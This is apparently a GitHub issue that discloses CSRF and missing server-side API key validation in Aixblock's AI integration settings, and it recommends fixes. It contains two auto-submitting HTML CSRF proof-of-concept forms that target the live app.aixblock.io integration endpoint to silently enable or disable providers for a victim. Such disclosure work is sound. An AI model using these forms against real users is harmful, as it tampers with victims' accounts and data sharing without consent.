-
Notifications
You must be signed in to change notification settings - Fork 121
Description
🧩 Summary
Aixblock provides users the ability to integrate with multiple AI providers—OpenAI, Anthropic, Replicate, and its native Aixblock AI. These integrations appear to require an API key input before activation. However, this validation is not enforced server-side.
Additionally, the platform’s integration toggle endpoints lack CSRF protection entirely. As a result, a malicious actor can silently enable or disable any integration on behalf of a logged-in victim using a crafted page, without their knowledge or consent.
Notably, while enabling always succeeds, the disabling (delete) side is inconsistently handled for all four providers, including Aixblock’s native integration — meaning CSRF is still possible, but sometimes fails due to timing, session instability, or race conditions rather than proper security enforcement.
🧠 Affected Providers
-
✅ OpenAI
-
✅ Anthropic
-
✅ Replicate
-
✅ Aixblock AI
All providers are impacted by both CSRF and lack of server-side API key validation.
💥 Impact
-
Attacker can silently toggle any AI integration on/off in a victim's account.
-
No valid API key is required to enable integrations.
-
Disabling (deletion) of integrations is possible via CSRF even when the UI suggests confirmation or validation.
-
Unauthorized data sharing with 3rd-party providers may occur (e.g., OpenAI, Anthropic).
-
Potential misuse of victim’s automation, API call quotas, or account limits.
-
Business logic and security UX breakdown — users are misled by the frontend requirement of an API key.
🧪 Steps to Reproduce
✅ 1. Enable Integration Without API Key
-
Log in as a normal user.
-
Navigate to AI Integration settings (e.g., OpenAI).
-
Do not provide any API key. Click “Save”.
-
Observe: Integration becomes enabled anyway.
🚨 2. CSRF Exploit (Silent Enable for Any Provider)
<!-- csrf-enable.html -->
<form action="https://app.aixblock.io/api/integrations/ai-extension" method="POST">
<input type="hidden" name="enabled" value="true">
<input type="hidden" name="provider" value="openai"> <!-- Replace with 'replicate', 'anthropic', or 'aixblock-ai' -->
</form>
<script>
document.forms[0].submit();
</script>
⚠️ 3. CSRF Exploit (Silent Disable – Inconsistent)
<!-- csrf-disable.html -->
<form action="https://app.aixblock.io/api/integrations/ai-extension" method="POST">
<input type="hidden" name="enabled" value="false">
<input type="hidden" name="provider" value="aixblock-ai"> <!-- Replace with any provider -->
</form>
<script>
document.forms[0].submit();
</script>
Result: Enable always succeeds.
Disable requests are processed, but often behave inconsistently — sometimes hanging or silently failing due to lack of response. This is not due to security, but rather backend timing flaws.
📉 Observed Behavior Summary
Provider | Enabled w/o API Key | Disable via CSRF | Notes |
---|---|---|---|
OpenAI | ✅ Yes | No API key required; CSRF works | |
Anthropic | ✅ Yes | Same as above | |
Replicate | ✅ Yes | Same as above | |
Aixblock AI | ✅ Yes | Same CSRF flaw; no validation |
⚙️ Root Causes
🔓 No CSRF tokens or SameSite protection on integration endpoints.
🔓 Server accepts requests without checking or validating API keys.
🔓 Server trusts frontend-only logic for gating actions.
🔓 Misleading UI implies a validation that does not exist.
🔐 Recommendations
Enforce API Key Validation Server-Side
Require real, validated API keys per provider.
Do not process requests with missing or dummy keys.
Implement Proper CSRF Protection
Use anti-CSRF tokens.
Set cookies with SameSite=Lax or Strict.
Harden Disable Logic
Ensure the enabled=false requests are authenticated, validated, and reliably handled.
Return consistent response codes.
Align UI with Backend Logic
If an API key is not mandatory, do not prompt for one.
If it is mandatory (preferred), enforce it server-side.
Final Score: 9.0 (Critical)
📌 Conclusion
The AI integration logic on Aixblock suffers from critical backend design flaws: no CSRF protection, missing validation of API keys, and inconsistent behavior for disable flows. Any attacker can exploit this to manipulate automation settings, potentially causing data exposure, financial risk, and logic compromise for all affected users.
POC HERE
https://drive.google.com/file/d/1YdE2ZTLq18RL2-Ua9R8lfSaTLnTXlCBe/view?usp=drive_link
https://drive.google.com/file/d/1L6cvQcyIcL34EnbKbqCNxixh49XxYEzb/view?usp=drive_link